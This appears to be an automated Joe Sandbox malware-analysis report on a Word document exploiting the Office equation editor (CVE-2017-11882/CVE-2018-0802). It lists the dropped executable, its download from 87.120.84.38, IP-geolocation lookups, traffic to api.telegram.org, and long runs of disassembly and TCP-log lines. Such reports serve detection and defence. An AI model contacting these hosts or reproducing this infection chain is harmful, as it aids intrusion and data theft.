Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe	Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 87.120.84.38 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_002B69B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002B9743h	7_2_002B9330
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002B767Dh	7_2_002B7490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002B8007h	7_2_002B7490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002B9181h	7_2_002B8EC2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002BEB89h	7_2_002BE8A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_002B71C9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002BF4B9h	7_2_002BF1D9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002BFDE9h	7_2_002BFB08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002BF021h	7_2_002BED40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002B9743h	7_2_002B9672
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 002BF951h	7_2_002BF670
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_002B6FEA
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005685AAh	7_2_005682B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00564321h	7_2_00564050
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056E54Ah	7_2_0056E250
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00560311h	7_2_00560040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00567111h	7_2_00566E40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00568F3Ah	7_2_00568C40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00566349h	7_2_00566078
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00562339h	7_2_00562068
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056CD62h	7_2_0056CA68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056BF0Ah	7_2_0056BC10
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005650E9h	7_2_00564E18
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005610D9h	7_2_00560E08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00567F7Ah	7_2_00567C08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00563101h	7_2_00562E30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056FD32h	7_2_0056FA38
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056A722h	7_2_0056A428
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005607A9h	7_2_005604D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005675A9h	7_2_005672D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056C3D2h	7_2_0056C0D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056DBBAh	7_2_0056D8C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00563599h	7_2_005632C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056ABEAh	7_2_0056A8F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005647B9h	7_2_005644E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00569D92h	7_2_00569A98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056B57Ah	7_2_0056B280
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00565581h	7_2_005652B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00561571h	7_2_005612A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056F3A2h	7_2_0056F0A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00565A19h	7_2_00565748
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056BA42h	7_2_0056B748
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00560C41h	7_2_00560970
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00567A41h	7_2_00567770
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056F86Ah	7_2_0056F570
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00568A72h	7_2_00568778
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00563A09h	7_2_00563760
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056A25Ah	7_2_00569F60
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005667E2h	7_2_00566510
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056EA12h	7_2_0056E718
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005627D1h	7_2_00562500
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00569402h	7_2_00569108
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056D22Ah	7_2_0056CF30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00561A09h	7_2_00561738
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00561EA1h	7_2_00561BD0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005698CAh	7_2_005695D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056D6F2h	7_2_0056D3F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00565EB1h	7_2_00565BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056EEDAh	7_2_0056EBE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00562C69h	7_2_00562998
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00564C51h	7_2_00564980
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056E082h	7_2_0056DD88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00563E89h	7_2_00563BB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056B0B2h	7_2_0056ADB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0056C89Ah	7_2_0056C5A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00566C79h	7_2_005669A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0058033Ah	7_2_00580040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0058330Ah	7_2_00583010
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00581B22h	7_2_00581828
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005837D2h	7_2_005834D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00581FEAh	7_2_00581CF0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00581192h	7_2_00580E98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0058297Ah	7_2_00582680
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00582E42h	7_2_00582B48
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0058165Ah	7_2_00581360
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00580802h	7_2_00580508
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00580CCAh	7_2_005809D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 005824B3h	7_2_005821B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00583C9Ah	7_2_005839A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062AD11h	7_2_0062AA68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062BA19h	7_2_0062B770
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00623319h	7_2_00623070
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00624021h	7_2_00623D78
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062C721h	7_2_0062C478
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062EC49h	7_2_0062E978
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062FA11h	7_2_0062F740
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00626FE9h	7_2_00626D40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00627CF1h	7_2_00627A48
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 006289F9h	7_2_00628750
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00629701h	7_2_00629458
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062C2C9h	7_2_0062C020
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00623BC9h	7_2_00623920
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062CFD1h	7_2_0062CD28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 006248D1h	7_2_00624628
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 006255D9h	7_2_00625330
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062DCD9h	7_2_0062DA30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 006262E1h	7_2_00626038
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 006292A9h	7_2_00629000
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062F0E1h	7_2_0062EE10
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062B5C1h	7_2_0062B318
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00625E89h	7_2_00625BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062E7B1h	7_2_0062E4E0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00626B91h	7_2_006268E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00627899h	7_2_006275F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 006285A1h	7_2_006282F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062B169h	7_2_0062AEC0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00623771h	7_2_006234C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062BE71h	7_2_0062BBC8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062CB7Bh	7_2_0062C8D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00624479h	7_2_006241D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00625181h	7_2_00624ED8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062D881h	7_2_0062D5D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00628149h	7_2_00627EA0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062F579h	7_2_0062F2A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00628E51h	7_2_00628BA8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00629B59h	7_2_006298B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062D429h	7_2_0062D180
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00624D29h	7_2_00624A80
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00625A31h	7_2_00625788
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 0062E1C5h	7_2_0062DE88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00626739h	7_2_00626490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then jmp 00627441h	7_2_00627198
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_00695F28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_00695F38
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_00692B00
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_00692E16
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_00692AF2

Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: api.telegram.org

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic	TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
